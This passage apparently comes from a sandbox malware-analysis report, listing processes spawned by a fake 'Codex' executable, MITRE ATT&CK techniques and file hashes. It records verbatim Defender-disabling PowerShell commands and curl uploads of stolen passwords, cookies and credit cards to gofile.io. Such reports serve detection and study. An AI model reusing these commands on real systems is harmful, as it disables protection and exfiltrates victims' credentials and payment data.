  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5752 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:1
  2⤵
  PID:744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,17735317792365578325,17569337602753946204,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6156 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4616

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:404
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:4648
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.0.1351547598\1303765925" -parentBuildID 20221007134813 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3845002e-737e-4839-ace7-05197328e1af} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 1972 1e1b79da558 gpu
    3⤵
    PID:4604
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.1.1431811578\1520556166" -parentBuildID 20221007134813 -prefsHandle 2336 -prefMapHandle 2332 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c54b0af0-f063-4e9e-856f-7d0f062a51e5} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 2364 1e1b7332c58 socket
    3⤵
    - Checks processor information in registry
    PID:3980
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.2.44460018\1649202281" -childID 1 -isForBrowser -prefsHandle 3160 -prefMapHandle 3176 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f9d5d7e4-fae4-4891-9ad9-13e3d0b5c108} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 3196 1e1bb96d258 tab
    3⤵
    PID:2852
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.3.217637180\651938381" -childID 2 -isForBrowser -prefsHandle 3520 -prefMapHandle 3516 -prefsLen 26001 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {80e47a20-c400-46c3-9bc2-7edbdd09e629} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 3536 1e1ba09e658 tab
    3⤵
    PID:1500
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.4.1609683303\376207927" -childID 3 -isForBrowser -prefsHandle 3728 -prefMapHandle 3724 -prefsLen 26001 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55c72b24-3d21-4710-8265-523637d34e37} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 3740 1e1ba8ee258 tab
    3⤵
    PID:2616
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.5.261086414\98147339" -childID 4 -isForBrowser -prefsHandle 3772 -prefMapHandle 2828 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {76d5a159-4908-4263-aaeb-4be843f8eeed} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 5164 1e1ba8da658 tab
    3⤵
    PID:5404
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.6.1913830193\505006837" -childID 5 -isForBrowser -prefsHandle 5308 -prefMapHandle 5312 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7debfb3d-ec35-4d01-938f-b6cda5d0e746} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 5300 1e1ba8d8b58 tab
    3⤵
    PID:5412
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4648.7.1601127248\1618274790" -childID 6 -isForBrowser -prefsHandle 5496 -prefMapHandle 5500 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1424 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {efba8e82-f1d3-40f0-98c7-8a96bd70aec1} 4648 "\\.\pipe\gecko-crash-server-pipe.4648" 5488 1e1ba8da358 tab
    3⤵
    PID:5420

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1576

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1964

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x30c 0x4c0
1⤵
PID:5592

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2292

C:\Users\Admin\Desktop\Codex-x86_64\Codex-x86_64.exe.exe.exe
"C:\Users\Admin\Desktop\Codex-x86_64\Codex-x86_64.exe.exe.exe"
1⤵
PID:5944
- C:\Users\Admin\AppData\Local\Temp\BUILT.EXE
  "C:\Users\Admin\AppData\Local\Temp\BUILT.EXE"
  2⤵
  - Executes dropped EXE
  PID:4352
- - C:\Users\Admin\AppData\Local\Temp\BUILT.EXE
    "C:\Users\Admin\AppData\Local\Temp\BUILT.EXE"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILT.EXE'"
      4⤵
      PID:5696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\BUILT.EXE'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:3948
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3768
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:4596
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3232
- C:\Users\Admin\AppData\Local\Temp\CLIENT-BUILT.EXE
  "C:\Users\Admin\AppData\Local\Temp\CLIENT-BUILT.EXE"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5280
- C:\Users\Admin\AppData\Local\Temp\CSTEALER.EXE
  "C:\Users\Admin\AppData\Local\Temp\CSTEALER.EXE"
  2⤵
  - Executes dropped EXE
  PID:5636
- - C:\Users\Admin\AppData\Local\Temp\CSTEALER.EXE
    "C:\Users\Admin\AppData\Local\Temp\CSTEALER.EXE"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:3300
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:444
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:4588
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:5772
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:3720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:5652
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:3464
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:4892
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:4620
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:2644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store14.gofile.io/uploadFile"
      4⤵
      PID:5476
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:5856
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupEnter.i64" https://store14.gofile.io/uploadFile"
      4⤵
      PID:5584
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupEnter.i64" https://store14.gofile.io/uploadFile
        5⤵
        
        PID:4412
- C:\Users\Admin\AppData\Local\Temp\SOURCE_PREPARED.EXE
  "C:\Users\Admin\AppData\Local\Temp\SOURCE_PREPARED.EXE"
  2⤵
  - Executes dropped EXE
  PID:3380
- - C:\Users\Admin\AppData\Local\Temp\SOURCE_PREPARED.EXE
    "C:\Users\Admin\AppData\Local\Temp\SOURCE_PREPARED.EXE"
    3⤵
    - Enumerates VirtualBox DLL files
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:968
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\pysilon logged\""
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\pysilon logged\activate.bat""
      4⤵
      PID:4560
    - - C:\Windows\system32\attrib.exe
        
        attrib +s +h .
        5⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2772
    - - C:\Users\Admin\pysilon logged\pysilon.exe
        
        "pysilon.exe"
        5⤵
        Executes dropped EXE
        
        PID:5772
      - C:\Users\Admin\pysilon logged\pysilon.exe
        
        "pysilon.exe"
        6⤵
        Enumerates VirtualBox DLL files
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:3344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:2372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\pysilon logged\""
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4016
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "SOURCE_PREPARED.EXE"
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5892

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6116

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2316
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Codex-x86_64\main.lua
  2⤵
  PID:5012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

File and Directory Discovery

T1083

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
7c6136bc98a5aedca2ea3004e9fbe67d

SHA1
74318d997f4c9c351eef86d040bc9b085ce1ad4f

SHA256
50c3bd40caf7e9a82496a710f58804aa3536b44d57e2ee5e2af028cbebc6c2f2

SHA512
2d2fb839321c56e4cb80562e9a1daa4baf48924d635729dc5504a26462796919906f0097dd1fc7fd053394c0eea13c25219dec54ffe6e9abb6e8cb9afa66bada

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
5c6aef82e50d05ffc0cf52a6c6d69c91

SHA1
c203efe5b45b0630fee7bd364fe7d63b769e2351

SHA256
d9068cf3d04d62a9fb1cdd4c3cf7c263920159171d1b84cb49eff7cf4ed5bc32

SHA512
77ad48936e8c3ee107a121e0b2d1216723407f76872e85c36413237ca1c47b8c40038b8a6349b072bbcc6a29e27ddda77cf686fa97569f4d86531e6b2ac485ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000021

Filesize
21KB

MD5
b1dfa46eee24480e9211c9ef246bbb93

SHA1
80437c519fac962873a5768f958c1c350766da15

SHA256
fc79a40b2172a04a5c2fe0d5111ebeb401b9a84ce80c6e9e5b96c9c73c9b0398

SHA512
44aefedf8a4c0c8cbc43c1260dc2bbc4605f83a189b6ef50e99058f54a58b61eb88af3f08164671bad4bd9c5e3b97b755f2fa433490bef56aa15cdf37fb412b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000022

Filesize
36KB

MD5
f90ac636cd679507433ab8e543c25de5

SHA1
3a8fe361c68f13c01b09453b8b359722df659b84

SHA256
5b4c63b2790a8f63c12368f11215a4ffec30c142371a819a81180a32baeb2bce

SHA512
7641a3610ad6516c9ecd0d5f4e5fa1893c7c60ca3ba8ae2e1b3b0cc3a72f7f9bef4c776a1f2fc52f366bd28a419ae3594a6576e886e79a20ebd98b55b2acc967

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000024

Filesize
17KB

MD5
950eca48e414acbe2c3b5d046dcb8521

SHA1
1731f264e979f18cdf08c405c7b7d32789a6fb59

SHA256
c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2

SHA512
27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
329904f77ef773a4813f7b39a78f8c72

SHA1
fb9dc04dd717cc9e22a63b0268743319de9f31ca

SHA256
1e9764a1fb01b8deefdff08e48602ba60ba42bcbe1f5a09f1fdcb26ae2d4d331

SHA512
6eaa1a639dc68108c21e1bb0654561543ca62993d07932c50b48b8db577cf83fc30de894bc6fe238253bd5ac9c46cefc984e833292d543a7b79ba37ee47f1c2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
ae096e2c14437484c25200d7f2f923e0

SHA1
b817061a0ae70641c8901108bbd7df2e9574eb06

SHA256
1a311a19f57081a99d88aef53e83e2025a29a7bccd8759ac2a91dd908e61dd97

SHA512
4e1c4ae5177ebbd70f85044c0cde4fc203cd81c4c15f36fe742d65109d50fe63a0d9e623ffdd34c9011e977c570eef50087be0cd3796e8c3d5c7027f6961e944

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\Origins\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
188B

MD5
008114e1a1a614b35e8a7515da0f3783

SHA1
3c390d38126c7328a8d7e4a72d5848ac9f96549b

SHA256
7301b76033c2970e61bab5eaddaff5aa652c39db5c0ea5632814f989716a1d18

SHA512
a202fc891eace003c346bad7e5d2c73dadf9591d5ce950395ff4b63cc2866b17e02bd3f0ad92749df033a936685851455bcdbfad30f26e765c3c89d3309cb82b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7e0842cbafc98b24a5633d0cc57b7f09

SHA1
1b0a8eca6469a96689fbab801055aaad0b69b16e

SHA256
2cfdbf4003624b7770dc3c733d2ca1bd9bc4a3c1014a185141780c99ac7866dc

SHA512
29aadd5f87bf85dedaadf53a325fc4f37d192406d1e604434d04da978499a05241889db8559e3639c53fe2415062bf3127b770aa63ff187a407295b5b7d6e75d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
02818dbbadbfe0e3fe35c6ea36178f15

SHA1
b040b43c8c496476090b893f9bb7431ec910a69d

SHA256
a428cf733b405d8575378acc6ffd5821b9ea5139f9602a5e7748a638fb19e9ad

SHA512
84d26081cf08b622128bc2018ac42960cb19d3ee67ffd2fbd3886d54995e8bbfa32aa45e27cb3bf304212670cb85ed07a2b8deb1e61a291b35b2171916730aac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
14efb48fc19488b058696e62546123cf

SHA1
20ee257d348267f1b26d690dac2c98764c69a218

SHA256
ab864facd914dc1b0e60bbcddf63f01cf79cfbd53a99a23b6c763ec43b170e95

SHA512
b741645db91390974e6ddd79f4e508b2506780c2ada6eead4805eac0f0daed91f727538c72f6915c1546c2b5086dd427406d79e2fb2126651da14c0a4ed0aac3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
10b077871a4f81a5f6c85456358fccb6

SHA1
572b0c0ad9013720003fe6dd42870e0a353a2d2e

SHA256
58eda40d8adc67bc453be29ba8196684149c9d7bef0496927d07777825d96b34

SHA512
851d76a27e55bfce5af6c8f3189ef0aaa125ff608e24d61844f6815fd6396b7923ec53e7545ea0300b2071d834042e3f5bd256a7ed897f1c17aea6f46fa976fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
ae4d304d18e8669b8c86faae94b49450

SHA1
794d72d1c1a3175b043359003c95220478e1a87e

SHA256
6f305e05a1836f9c07ec7c797ec8a923be071f142acd357a3a5c9dc4ea1746c2

SHA512
f0a4a2820852a0b53b5c082d0d3eb2800b19ba3b53a099586e4f108666bddd733fede732cf4c06bca5a2c0abb06e2a5b21b4f5210946d381679bbf3ad304435f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
16cc81866b2e795f187d2d753b6c5eed

SHA1
be571982b0ffc4b7c7869dc3717a33ac9b8ce0d7

SHA256
1dd2e00ed9fd84713f069baca8e5338dbc7a9ff35d8225f4475b69e4d548aa28

SHA512
52a4aff5650175e1846a939feefe761ddbea5317eb2b3c3c762392347315b43942c50aa73d6baf041878aac51f5fd1a9e2a4dca24df8d0feea8a69a94669e874

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58439c.TMP

Filesize
48B

MD5
6ea44d172e6b73a077aa352c292d09c0

SHA1
76876e554a944f0e8e73a101c71e347be1f0b4ef

SHA256
1700e919fc3e6dda2da1de4530be0fb468ad67134e33040d11df5ae2f3244dde

SHA512
9879351e2c1b4275b04396438b80f3e7554096464a0772953d22492717351ab07db297d6864540d32ac5a79a09b048c70ff6f34130eea086a021fa0d9e72c228

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
203B

MD5
8b75fe3197138486958f19ef5971227c

SHA1
b974ea976a070a8a6f97a8fc1439046a28fd803e

SHA256
8dc7bd48443c1e897d4ad1b818d8472661dda0f7812c47198c67c2f03b5a43b6

SHA512
e754b639aa15d6737339b09f45f812c39ea6ed61e915637b001842b58e57a395e58999d30c085892366a0ffbe243e990657898314600002e8aa432fec37ddc85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5894aa.TMP

Filesize
203B

MD5
cde368dbaa3429f0bd5421e91d904e17

SHA1
d9957e8c496a30d55b0cbfb78f9ad0e7ae5af377

SHA256
e39ef3072b5687e5db3654352996edfe598c9a2e6f70bbbf55fc9e6baba0a974

SHA512
c0110b08b7854e52e7efba47b7a257042098d4b2281bb88ac25982c166f0b1912eb2e1eccfd250014091b5323f9eaee9bd3ef1fb0f933051c25526776f57b33c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
79262fea4fffcf266a849b8685b6dc07

SHA1
6125c3eb30b63ae3f35b15ebf00b60b4033d9063

SHA256
65f4ebbe98eb64978692b6157792fcb0e213cc908d91e7c2a4e0825d8494c2de

SHA512
62e09d6d8e1a6d4eca66208bd60c3687541104d24231373612773d78973b52ce8bfc59bbaea286914bdd07e8758830e1486f5be102a842b72f156c47661c42a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
6600a4580e187fe82513804e9685f02b

SHA1
dc04836ade8c55225f5950316f7aa921174eab8f

SHA256
f433783712ad08d793dc98a9ad8ff1e6f5c6797f0c1e9b78b6ca585758974cc7

SHA512
af424a6760d05344949f835643b88cb5ae5b62ecca7bb53dbeaeb9dca3a3d6d262c932900eceec0e45b9d042fef735575283d8400edfd92bca94e11d837dc6fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
5e25bb83cabaaeb4809e3d0fa75120b1

SHA1
b7fe4de7770e7ea756d492fc4a49d565a75e2657

SHA256
f8fd1380bc704324e782b17373361198b5bcbcb4a586d457634e09691073a487

SHA512
3dcecb9e87692a337be25a3dffc440f793565dc64b4534b3d1a2af8d4be07470dfa6ef466adc88228166a2df477c84414d446783935c438addd5c291901a0810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
f700fe7f2a3b571058d87c6fb0705b43

SHA1
7ebde5578fa264b322f01237d4c3aca75b018c59

SHA256
73e709ed2246e9a5bc2305d86eee78d10e8d052dda82d847a3f435043f552b19

SHA512
2ee144862a3b00df749ffa8d8e230c554be9e8d491679d9a962c186d1717e8749cebd5c7e24820296745eb0710ab363a9eed6323b0b59d2d44a6425f8f309d04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
97a9fbcb62debfb576596fd6ec194c1d

SHA1
0d4cefc669c561521e6fe2c9318ddf2f153dd5e0

SHA256
186c5b5f80ec0ca09cd071988636e3efc8479481a5ea226bca777417b1565aa4

SHA512
744cc453ee9d9b1273262a3bbdb30f833e4476e51354a7ba98640ddfe8c16c7673afad0212c79fa543fcb98f71c951af3f607db72366c33f503ea15ba986c362

Download Submit
C:\Users\Admin\AppData\Local\Temp\BUILT.EXE

Filesize
6.9MB

MD5
dfdd8fb6155b62f133315f9487afea8f

SHA1
76742a809295062383a37555263925c64c4653a9

SHA256
35ba674cd132e90df3ee70cf930588f3ff80f34e391c0064288a9f51f830e677

SHA512
f7582c166642dbbf0dbd29de29aca9e9fe8635aeff5d22c1f2438bbfddadf8f412a8f13944aa49c2dce6db180b9b5a7fe4a5adabdfbc62362d44f2d5d2d6d289

Download Submit
C:\Users\Admin\AppData\Local\Temp\CLIENT-BUILT.EXE

Filesize
78KB

MD5
ef96eef28c98e255f9a8459dcfd1f533

